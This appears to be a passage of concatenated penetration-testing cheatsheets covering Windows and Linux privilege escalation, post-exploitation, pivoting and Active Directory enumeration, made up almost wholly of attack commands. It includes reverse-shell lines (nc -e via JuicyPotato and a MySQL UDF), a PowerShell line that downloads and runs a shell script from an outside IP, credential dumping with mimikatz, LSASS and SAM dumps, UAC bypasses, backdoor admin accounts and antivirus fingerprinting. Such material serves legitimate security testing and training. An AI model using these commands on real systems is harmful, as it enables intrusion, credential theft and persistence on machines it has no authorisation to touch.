upnphost 372 | net start upnphost 373 | ``` 374 | 375 | ### Unquoted Service Paths 376 | 377 | ```bat 378 | # Using PowerSploit 379 | Get-ServiceUnquoted 380 | Write-ServiceBinary -Name "GDCAgent' -Path "C:\GDCAgent.exe" 381 | 382 | # Using WMIC 383 | wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 384 | wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """ 385 | gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name 386 | 387 | # Using sc 388 | sc query 389 | sc qc service name 390 | 391 | # Look for Binary_path_name and see if it is unquoted. 392 | 393 | # Metasploit 394 | exploit/windows/local/trusted_service_path 395 | # PowerSploit 396 | SharpUp PowerUp 397 | ``` 398 | 399 | ### AlwaysInstallElevated 400 | 401 | ```bat 402 | # manual cmd 403 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 404 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 405 | 406 | # PowerSploit 407 | Import-Module Privesc 408 | Get-RegistryAlwaysInstallElevated 409 | Write-UserAddMSI 410 | ``` 411 | 412 | ### What is running 413 | 414 | ```bat 415 | tasklist /v 416 | tasklist /v /fi "username eq system" 417 | tasklist /SVC 418 | wmic service list brief 419 | net start 420 | sc query 421 | Get-Service 422 | Get-Process 423 | Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize 424 | ``` 425 | 426 | ### Scheduled task 427 | 428 | ```bat 429 | sc qc 430 | schtasks /query /fo LIST /v /s 431 | schtasks /query /fo LIST 2>nul | findstr TaskName 432 | schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM 433 | dir C:\windows\tasks 434 | 435 | Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State 436 | ``` 437 | 438 | ### Startup services 439 | 440 | ```bat 441 | wmic startup get caption,command 442 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R 443 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 444 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 445 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 446 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 447 | dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 448 | dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 449 | 450 | Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl 451 | Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' 452 | Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce' 453 | Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run' 454 | Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce' 455 | Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup" 456 | Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup 457 | ``` 458 | 459 | ### Permissions 460 | 461 | ```bat 462 | dir /a "C:\Program Files" 463 | dir /a "C:\Program Files (x86)" 464 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 465 | 466 | Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime 467 | Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name 468 | 469 | icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone" 470 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone" 471 | icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 472 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 473 | 474 | icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone" 475 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone" 476 | icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 477 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 478 | 479 | cacls "c:\Program Files" /T | findstr Users 480 | 481 | accesschk.exe -uwcqv "Everyone" * -accepteula 482 | accesschk.exe -uwcqv "Authenticated Users" * 483 | accesschk.exe -uwcqv "Users" * 484 | accesschk.exe -ucqv * 485 | accesschk.exe -ucqv Spooler 486 | 487 | # Applocker exe bypass 488 | icacls.exe C:\Windows\Tasks 489 | 490 | # Applocker dll bypass 491 | accesschk.exe "" C:\Windows -wus 492 | 493 | ``` 494 | > For Windows XP and 2003, use an older version of accesschk : 495 | 496 | - [Accesschk-2003-xp.exe](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe) 497 | 498 | Interesting permissions to get shell 499 | 500 | ```bat 501 | SERVICE_ALL_ACCESS (full access) 502 | SERVICE_CHANGE_CONFIG (reconfigure binary) 503 | WRITE_DAC (reconfigure permissions) 504 | WRITE_OWNER (become owner, change permission) 505 | GENERIC_WRITE (inherits SERVICE_CHANGE_CONFIG) 506 | GENEROC_ALL (inherits SERVICE_CHANGE_CONFIG) 507 | ``` 508 | 509 | --- 510 | 511 | ## **Kernel Exploitation** 512 | 513 | ### Tools 514 | 515 | ```bat 516 | - msf 517 | post/windows/gather/enum_patches 518 | 519 | - https://github.com/rasta-mouse/Watson 520 | - https://github.com/rasta-mouse/Sherlock 521 | Find-AllVulns 522 | 523 | - https://github.com/SecWiki/windows-kernel-exploits 524 | - https://github.com/GDSSecurity/Windows-Exploit-Suggester 525 | ``` 526 | 527 | ### Manual discovery 528 | 529 | ```bat 530 | wmic qfe 531 | wmic qfe get Caption,Description,HotFixID,InstalledOn 532 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.." 533 | ``` 534 | 535 | --- 536 | 537 | ## **Insecure GUI apps** 538 | 539 | Application running as SYSTEM allowing an user to spawn a CMD, or browse directories. 540 | 541 | Example: "Windows Help and Support" \(Windows + F1\), search for "command prompt", click on "Click to open Command Prompt" 542 | 543 | --- 544 | 545 | ## **Abusing privileges** 546 | 547 | - [Priv2Admin](https://github.com/gtworek/Priv2Admin) : primary token checklist 548 | - [FullPowers](https://github.com/itm4n/FullPowers) : Enable all privs for service or network account 549 | 550 | ### Hot potato 551 | 552 | - [https://foxglovesecurity.com/2016/01/16/hot-potato/](https://foxglovesecurity.com/2016/01/16/hot-potato/) 553 | 554 | exe : [Potato.exe](https://github.com/foxglovesec/Potato) 555 | 556 | ```bat 557 | Potato.exe -ip -cmd [cmd to run] -disable_exhaust true -disable_defender true 558 | ``` 559 | 560 | powershell : [Tater.ps1](https://github.com/Kevin-Robertson/Tater) 561 | 562 | ```bat 563 | Invoke-Tater -Command "net localgroup administrators user /add" 564 | ``` 565 | 566 | ### RottenPotato 567 | 568 | **Token Impersonation** 569 | 570 | - [RottenPotato](https://github.com/foxglovesec/RottenPotato) 571 | - [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) 572 | 573 | Incognito (Meterpreter) 574 | 575 | ```bat 576 | getuid 577 | getprivs 578 | use incognito 579 | list\_tokens -u 580 | cd c:\temp\ 581 | execute -Hc -f ./rot.exe 582 | impersonate\_token "NT AUTHORITY\SYSTEM" 583 | ``` 584 | TokenManipulation 585 | 586 | ```bat 587 | Invoke-TokenManipulation -Enumerate 588 | Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" 589 | Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" 590 | Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" 591 | ``` 592 | > For more details, see next cheatsheet : [Domain Escalation](08-domain-escalation.md) 593 | 594 | ### Juicy Potato 595 | 596 | **abusing the golden privileges** 597 | 598 | - [Juicy Potato releases](https://github.com/ohpe/juicy-potato/releases) 599 | 600 | > Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +. 601 | 602 | ```bat 603 | Check the privileges of the service account, you should look for SeImpersonate and/or SeAssignPrimaryToken (Impersonate a client after authentication) 604 | 605 | whoami /priv 606 | 607 | Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object 608 | Windows 7 Enterprise 609 | Windows 8.1 Enterprise 610 | Windows 10 Enterprise 611 | Windows 10 Professional 612 | Windows Server 2008 R2 Enterprise 613 | Windows Server 2012 Datacenter 614 | Windows Server 2016 Standard 615 | 616 | Execute JuicyPotato to run a privileged command. 617 | 618 | JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} 619 | JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} 620 | JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe" 621 | Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 622 | ...... 623 | [+] authresult 0 624 | {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM 625 | [+] CreateProcessWithTokenW OK 626 | ``` 627 | 628 | ### tscon 629 | 630 | When you are local administrator run `psexec -s -i cmd ` to get shell as nt\system user 631 | 632 | then `query user` to have list of connected user (with id) and now you can get RDP session of the user : `cmd /k tscon /dest:console` 633 | 634 | --- 635 | 636 | ## **DLL hijacking** 637 | 638 | Tools 639 | 640 | ```bat 641 | - find missing dll 642 | https://technet.microsoft.com/en-us/sysinternals/processmonitor.aspx 643 | 644 | - PowerSploit 645 | Find-ProcessDLLHijack 646 | Find-PathDLLHijack 647 | Write-HijackDll 648 | 649 | - msf 650 | exploit/windows/local/ikeext_service 651 | ``` 652 | 653 | ```bat 654 | dll missing search paths order : 655 | The directory from which the application is loaded 656 | C:\Windows\System32 657 | C:\Windows\System 658 | C:\Windows 659 | The current working directory 660 | Directories in the system PATH environment variable 661 | Directories in the user PATH environment variable 662 | ``` 663 | 664 | ```bat 665 | icacls C:\Perl64 666 | ``` 667 | 668 | --- 669 | 670 | ## **Vulnerable Drivers** 671 | 672 | - [DriverQuery](https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery) 673 | 674 | ```bat 675 | driverquery 676 | driverquery.exe /fo table 677 | DriverQuery.exe --no-msft 678 | ``` 679 | 680 | --- 681 | 682 | ## **Named Pipes** 683 | 684 | Tools 685 | 686 | ```bat 687 | - SeatBelt.exe 688 | ``` 689 | 690 | Manual 691 | 692 | ```bat 693 | Find named pipes: [System.IO.Directory]::GetFiles("\\.\pipe\") 694 | Check named pipes DACL: pipesec.exe 695 | Reverse engineering software 696 | Send data throught the named pipe : program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe 697 | ``` 698 | 699 | ## **UAC Bypass** 700 | 701 | ```sh 702 | # https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 703 | Invoke-EventVwrBypass -Command "powershell.exe " 704 | Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe " 705 | powershell.exe -ExecutionPolicy Bypass -c Import-Module -Name C:\Windows\temp\Invoke-EventVwrBypass.ps1;Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA=" 706 | 707 | # https://github.com/hfiref0x/UACME 708 | msbuild "c:\projects\uacme\Source\uacme.sln" /verbosity:normal /logger:"C:\Program Files\AppVeyor\BuildAgent\Appveyor.MSBuildLogger.dll" 709 | ``` 710 | 711 | --- 712 | 713 | ## **Refs** 714 | 715 | - [https://book.hacktricks.xyz/windows/windows-local-privilege-escalation](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation) 716 | - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) 717 | 718 | --- 719 | 720 | ## **To check** 721 | 722 | - Invoke-WCMDump -- Extracts crendentials from Credential Manager. Detected. 723 | - DomainPasswordSpray -- Spray gathered passwords across domain Inveigh -- 724 | - Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool. 725 | 726 | -------------------------------------------------------------------------------- /Cheatsheets/internal/04-lpe-linux.md: -------------------------------------------------------------------------------- 1 | # Priv-Esc Linux 2 | 3 | ## **Tools** 4 | 5 | - [lse.sh](https://github.com/diego-treitos/linux-smart-enumeration) 6 | - [LinEnum](https://github.com/rebootuser/LinEnum) 7 | 8 | --- 9 | 10 | ## **Kernel Exploitation** 11 | 12 | ### Check version 13 | 14 | ```bash 15 | uname -a 16 | cat /etc/*release 17 | cat /etc/issue 18 | ``` 19 | 20 | ### Check exploit 21 | 22 | ```bash 23 | searchsploit linux kernel | grep -v dos | grep | grep -i 'root|privilege|exploit' 24 | ``` 25 | 26 | --- 27 | 28 | ## **Programms running** 29 | 30 | ```bash 31 | ps -aux | grep root 32 | https://github.com/DominicBreuker/pspy 33 | ``` 34 | 35 | --- 36 | 37 | ## **Services listening** 38 | 39 | ```bash 40 | netstat -latupen | grep LISTEN 41 | netstat -nlt | awk -F : '/\/ {split($2,a," "); print a[1]}' | xargs -I % bash -c 'echo -ne "\033[1;33m[+]\033[m Port %:\t$(timeout 1 cat /dev/null \; find / -perm -g=s -o -perm -u=s -type f 2>/dev/null 51 | ``` 52 | 53 | --- 54 | 55 | ## **Docker** 56 | 57 | ```bash 58 | # we look for docker.sock 59 | find / -group docker -exec ls -la {} 2>/dev/null \; 60 | ``` 61 | 62 | --- 63 | 64 | ## **Systemd** 65 | 66 | ```bash 67 | echo -e '#!/bin/bash\nchmod 4755 /bin/dash' > /tmp/priv.sh 68 | vi /lib/systemd/system/debug.service 69 | edit line : ExecStart in `/tmp/priv.sh 70 | reboot 71 | ``` 72 | 73 | 74 | ## **MySQL** 75 | 76 | Privilege escalation for mysql running as root with mysql root account 77 | 78 | - [mysqludf_msf](https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql) 79 | 80 | ```bash 81 | # Find plugin directory 82 | SHOW VARIABLES LIKE 'plugin_dir'; 83 | select @@plugin_dir; 84 | 85 | # Local method 86 | use mysql; 87 | create table tranilment(line blob); 88 | insert into tranilment values(load_file('/tmp/lib_mysqludf_sys_64.so')); 89 | select * from tranilment into dumpfile '//lib_mysqludf_sys_64.so'; 90 | create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'; 91 | select sys_exec('nc 1234 -e /bin/bash'); 92 | 93 | # Remote method 94 | select "////SAHRENAME/lib_mysqludf_sys_64.so" into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so'; 95 | create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'; 96 | select sys_exec('nc 1234 -e /bin/bash'); 97 | ``` 98 | 99 | --- 100 | 101 | 102 | ## **Debian-ssh** 103 | 104 | 105 | - [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) 106 | 107 | ```bash 108 | git clone https://github.com/g0tmi1k/debian-ssh.git 109 | de debian-ssh/our_tools/ 110 | tar xvjf ubunturoot.tar.bz2 111 | 112 | cp dokeygen.sh 113 | chroot ubunturoot /dokeygen.sh 1 -t dsa -b 1024 -f /tmp/dsa_1024_1 114 | 115 | ssh-keygen -l -E md5 -f ~/.ssh/id_rsa. 116 | 117 | #add "PubkeyAcceptedKeyTypes +ssh-dss" into client ssh conf 118 | #ssh -vvvvvvvvvvvvvvvvvvvvv helps to understand ! 119 | ``` 120 | 121 | 122 | -------------------------------------------------------------------------------- /Cheatsheets/internal/05-post-exploitation-windows.md: -------------------------------------------------------------------------------- 1 | # Post-Ex Windows 2 | 3 | ## **Dump secrets** 4 | 5 | ### LSA 6 | 7 | ```bash 8 | crackmapexec smb perim_up.txt -u '' -d '' -p '' --lsa 9 | ``` 10 | 11 | ### SAM 12 | ```bash 13 | crackmapexec smb -u -d -H --sam 14 | 15 | reg save hklm\sam .\sam reg save hklm\system .\system reg save hklm\security .\security 16 | impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL 17 | 18 | ``` 19 | ### LSASS 20 | ```bash 21 | crackmapexec smb -u -d -H -M lsassy 22 | 23 | lsassy -d '.' -u 'Administrateur' -H '' 24 | lsassy -d -u -p 25 | 26 | ./spraykatz.py -u -p -t 27 | 28 | pypykatz lsa minidump lsass.dmp 29 | 30 | procdump.exe --accepteula -ma lsass c:\WINDOWS\Temp\lsass.txt 31 | 32 | .\mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" exit 33 | ``` 34 | 35 | ### Kerberos 36 | 37 | ```bash 38 | .\mimikatz.exe "log" "privilege::debug" "kerberos::list /export" exit 39 | 40 | ``` 41 | 42 | ### Browser secrets 43 | 44 | ```bash 45 | sharpchrome.exe 46 | 47 | 48 | https://github.com/login-securite/DonPAPI 49 | 50 | DonPAPI.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" 51 | ``` 52 | 53 | ## Create/add new local admin account 54 | 55 | ```bash 56 | net user add 57 | net localgroup "Administrators" /add 58 | ``` 59 | 60 | ## Enable WinRM 61 | 62 | ```bash 63 | Enable-PSRemoting -SkipNetworkProfileCheck -Force 64 | ``` 65 | 66 | ## Enable RDP 67 | 68 | ```bash 69 | Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 70 | ``` 71 | 72 | add user to RDP group 73 | 74 | ```bash 75 | net localgroup "Remote Desktop Users" /add 76 | ``` 77 | 78 | ## Create service 79 | 80 | ```bash 81 | New-Service -BinaryPathName C:\Users\sqlServer\Documents\system2.exe -Name syshell -DisplayName syshell -StartupType Automatic 82 | Start-Service syshell 83 | ``` 84 | or 85 | 86 | ``` 87 | sc \\127.0.0.1 create ServiceName binpath=C:\windows\system32\calc.exe 88 | ``` 89 | > \192.168.1.2 is optional 90 | 91 | 92 | To check if service working well, you can reboot like this: 93 | 94 | `wmic /node:192.168.1.2 os get buildnumber` then 95 | 96 | `wmic /node:192.168.1.2 os where buildnumber="" call reboot` 97 | 98 | 99 | ## Execute binary using WMIC 100 | 101 | ``` 102 | wmic /node:127.0.0.1 process call create "C:\windows\system32\calc.exe" 103 | ``` 104 | >/node is optional 105 | 106 | 107 | ## Stop processus 108 | 109 | Run this to get processid : `sc \\127.0.0.1 query ServiceName` 110 | 111 | then : `wmic /node:127.0.0.1 process where processid= call terminate` 112 | >/node is optional 113 | 114 | and then `taskkill /S 127.0.0.1 /PID /f` 115 | >/S is optional 116 | 117 | 118 | ## Create Scheduled tasks 119 | 120 | ``` 121 | schtasks /create /S 192.156.1.2 /tn /sc once /sd 01/01/1910 /ru system /tr “C:\windows\system32\calc.exe” 122 | 123 | Other 124 | 125 | schtasks /create /S 127.0.0.1 /tn OBLIGE /tr "C:\windows\system32\calc.exe" /sc once /ST 18:30 126 | ``` 127 | > ru , and /S is optional 128 | > To check if tasks has been created run this `schtasks /s 192.156.1.2 /query /tn ` 129 | 130 | 131 | 132 | ## COM hijack 133 | 134 | ```bash 135 | schtasks /query /xml > tasks.xml 136 | reg query "HKCR\CLSID\{}\Inprocserver32" 137 | reg query "HKCU\software\classes\CLSID\{}\Inprocserver32" 138 | reg query "HKLM\software\classes\CLSID\{}\Inprocserver32" 139 | reg export "HKLM\software\classes\CLSID\{}\Inprocserver32" export.reg 140 | 141 | # Change to HKCU and change dll 142 | reg import export.reg /reg:64 143 | reg query "HKCR\CLSID\{}\Inprocserver32" 144 | reg query "HKCU\software\classes\CLSID\{}\Inprocserver32" 145 | 146 | ``` 147 | 148 | ## Disconnect User 149 | 150 | `rwinsta /server:192.168.1.2 ` 151 | >to get sessionId please run this `qwinsta` 152 | 153 | ## detection of the anti virus (AV) 154 | 155 | run `fltmc` to get list of altitude, and search it into windows documentation : https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes 156 | 157 | for exemple `389040 = SentinelOne` 158 | 159 | AV range is : 320000 - 329998 160 | 161 | 162 | It's also possible to get AV from process list 163 | 164 | for exemple 165 | 166 | ``` 167 | Microsoft Defender MSMpEng.exe 168 | Trend Micro TMBMSRV.exe 169 | Avira avguard.exe/Avira.ServiceHost.exe 170 | Bitdefender bdagent.exe/vsserv.exe 171 | Kaspersky avp.exe/ksde.exe 172 | AVG AVGSvc.exe 173 | Norton NortonSecurity.exe 174 | McAfee MCAPExe.exe/mfemms.exe 175 | Panda PavPrSvr.exe 176 | Avast afwServ.exe/AvastSvc.exe 177 | ``` 178 | -------------------------------------------------------------------------------- /Cheatsheets/internal/06-post-exploitation-linux.md: -------------------------------------------------------------------------------- 1 | # Post-Ex Linux 2 | 3 | ## **Hash dump** 4 | 5 | ```bash 6 | sudo xxd /etc/shadow | xxd -r 7 | ``` 8 | 9 | --- 10 | 11 | ## **Strace root** 12 | 13 | ```bash 14 | sudo strace -o /dev/null /bin/sh 15 | ``` -------------------------------------------------------------------------------- /Cheatsheets/internal/07-pivoting.md: -------------------------------------------------------------------------------- 1 | # Pivoting 2 | 3 | ### Single reverse port forwarding 4 | 5 | ```bash 6 | plink.exe -l root -pw password -R 445:127.0.0.1:445 7 | ssh -l root -pw password -R 445:127.0.0.1:445 8 | ``` 9 | 10 | ### Single Local port forwarding 11 | 12 | ```bash 13 | ssh -l root -pw password -L 445:127.0.0.1:445 14 | ``` 15 | 16 | ### Dynamic port forwarding 17 | 18 | Socks proxy (socks5) 19 | 20 | ```bash 21 | ssh -l root -pw password -D 1234 22 | 23 | # Reverse dynamic 24 | ssh -R 1234 25 | ``` 26 | 27 | Double SSH tunnel 28 | 29 | ```bash 30 | ssh <1st_target> -L 2222:<2nd_target>:22 31 | ssh localhost -p 2222 -D 1234 32 | ``` 33 | 34 | ### Proxychains 35 | 36 | ```bash 37 | # Choose any tools to create a socks proxy 38 | ssh -D 1234 39 | 40 | # Configure proxychains.conf with the protocl and port you chose for the socks proxy 41 | sudo vim /etc/proxychains.conf 42 | quiet_mode # enable this 43 | socks5 127.0.0.1 1234 # change this 44 | 45 | #Use any tool prepending the proxychains command : 46 | proxychains wpscan --url 47 | wpscan --url --proxy socks5://127.0.0.1:1234 --force 48 | 49 | # For nmap, you need to specify the -Pn and -sT arguments 50 | proxychains nmap -sT -Pn 51 | ``` 52 | > You can also forward a single port to avoid using a socks proxy, or use sshuttle 53 | 54 | 55 | ### SSHuttle 56 | 57 | transparent proxy over ssh 58 | 59 | ```sh 60 | # sudo apt-get update && sudo apt-get install sshuttle 61 | sshuttle -r :22 /24 62 | ``` 63 | 64 | --- 65 | 66 | ### Meterpreter 67 | 68 | ```sh 69 | #Socks Proxy 70 | run autoroute -s /24 71 | use auxiliary/server/socks4a 72 | exploit -j 73 | 74 | # Port forward 75 | portfwd add -l 3389 -p 3389 -r 76 | ``` 77 | 78 | ### Plink 79 | 80 | ```sh 81 | plink.exe -l root -pw password -R 445:127.0.0.1:445 [-P ] 82 | ``` 83 | 84 | ### [Chisel](https://github.com/jpillora/chisel) 85 | 86 | Socks proxy over SSH for Windows 87 | 88 | ```sh 89 | git clone git clone https://github.com/jpilloria/chisel && cd chisel && go build && go build -ldflags="-s -w" && upx build chisel && chmod +x chisel 90 | ./chisel client :10000 R:4506:127.0.0.1:4506 91 | chisel server -p 10000 --reverse 92 | ``` 93 | 94 | ### Socat 95 | 96 | ```sh 97 | curl -sL http://:1234/socat -o /tmp/socat && chmod +x /tmp/socat && cd /tmp 98 | 99 | # remote forward : redirect all trafic coming from TCP 4506 to remote host 100 | socat TCP-LISTEN:4506,reuseaddr,reuseport,fork,bind= TCP::4506 101 | 102 | # localhost forward : redirect all trafic coming from TCP 80 to TCP 5000 103 | socat TCP-LISTEN:80,fork TCP:127.0.0.1:5000 104 | 105 | ``` 106 | 107 | ### Netcat 108 | 109 | ```sh 110 | nc -v -lk -p 8001 -e /usr/bin/nc 127.0.0.1 8000 111 | nc.traditional -l -p 8001 -c "nc 127.0.0.1 8000" 112 | ``` 113 | 114 | ### [ReGeorg](https://github.com/sensepost/reGeorg) 115 | 116 | Socks proxy over web 117 | 118 | ## Scan 119 | 120 | [PortqryUI](https://www.microsoft.com/en-us/download/details.aspx?id=24009) 121 | 122 | ```sh 123 | . .\Invoke-Portscan.ps1 124 | Invoke-Portscan -Hosts , 125 | ``` 126 | 127 | -------------------------------------------------------------------------------- /Cheatsheets/internal/08-domain-escalation.md: -------------------------------------------------------------------------------- 1 | # Domain escalation 2 | 3 | ## **Domain enum** 4 | 5 | ### GUI enumeration 6 | 7 | - [RSAT](https://download.microsoft.com/download/1/D/8/1D8B5022-5477-4B9A-8104-6A71FF9D98AB/WindowsTH-RSAT_WS_1709-x64.msu) 8 | 9 | > After installing RSAT, you can go to "Users and Computers AD => View => Advanced" 10 | 11 | ### Full enumeration 12 | 13 | - [Bloodhound](https://github.com/BloodHoundAD/BloodHound) & [Sharphound injestor](https://github.com/BloodHoundAD/SharpHound3) or [bloodhound-python injestor](https://github.com/fox-it/BloodHound.py) 14 | - [Ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) 15 | - [windapsearch](https://github.com/ropnop/windapsearch) 16 | - [https://github.com/PowerShellMafia/PowerSploit](https://github.com/PowerShellMafia/PowerSploit) 17 | - [PowerView 2.0 Cheatsheet](https://gist.github.com/HarmJ0y/3328d954607d71362e3c) 18 | 19 | ```bash 20 | # Install full bloodhound 21 | sudo apt-get update && sudo apt-get install -y bloodhound python3-pip && pip3 install bloodhound 22 | # bloodhound-python 23 | bloodhound-python -d -p -dc -c All 24 | # Custom queries 25 | https://github.com/hausec/Bloodhound-Custom-Queries 26 | 27 | # ldapdomaindump install 28 | pip install ldapdomaindump 29 | # ldapdomaindump usage 30 | ldapdomaindump -u '\' -p '' 31 | 32 | # widapsearch install 33 | git clone https://github.com/ropnop/windapsearch.git && pip install python-ldap && cd windapsearch 34 | # windapsearch usage 35 | ./windapsearch.py -d -u -p '' --da -o 36 | ./windapsearch.py -d -u -p '' --full -o 37 | 38 | #ldapsearch 39 | sudo ldapsearch -x -LLL -H ldap://webmail..fr -D "cn=" -b "dc=,dc=" -w '' 40 | 41 | enum4linux -a 42 | ``` 43 | 44 | ### Find domain name 45 | 46 | ```bash 47 | cat /etc/resolv. 48 | 49 | Get-NetDomain 50 | Get-DomainSID 51 | 52 | nmap -sT -vvv --open -T2 -sC --script=*-ntlm-info -sV -p 110,995,143,993,3389,23,25,465,587,119,433,563,1433,80,8080,443,8443 53 | ``` 54 | 55 | ### Users enumeration 56 | 57 | Domain users and password policy \(especially complexity and lockout threshold for bruteforce\) 58 | 59 | ```bash 60 | net user /domain 61 | 62 | enum4linux |grep "user:" | cut -d '[' -f2 | cut -d "]" -f1 > users.txt 63 | 64 | $Searcher = New-Object DirectoryServices.DirectorySearcher 65 | $Searcher.Filter = "(&(objectclass=computer))" 66 | $Searcher.SearchRoot = '' 67 | $Searcher.FindAll() 68 | 69 | Get-NetUser | select samaccountname 70 | ``` 71 | 72 | ### Users with SPN 73 | 74 | ```bash 75 | $Searcher = New-Object DirectoryServices.DirectorySearcher 76 | $Searcher.Filter = "(&(!(samaccountname=krbtgt))(objectclass=user)(objectcategory=user)(servicePrincipalName=*))" 77 | $Searcher.SearchRoot = '' 78 | $Searcher.FindAll() 79 | 80 | Get-NetUser -SPN | select samaccountname,serviceprincipalname 81 | ``` 82 | 83 | 84 | ### Policy enumeration 85 | 86 | Domain users and password policy \(especially complexity and lockout threshold for bruteforce\) 87 | 88 | ```bash 89 | net accounts /domain 90 | 91 | 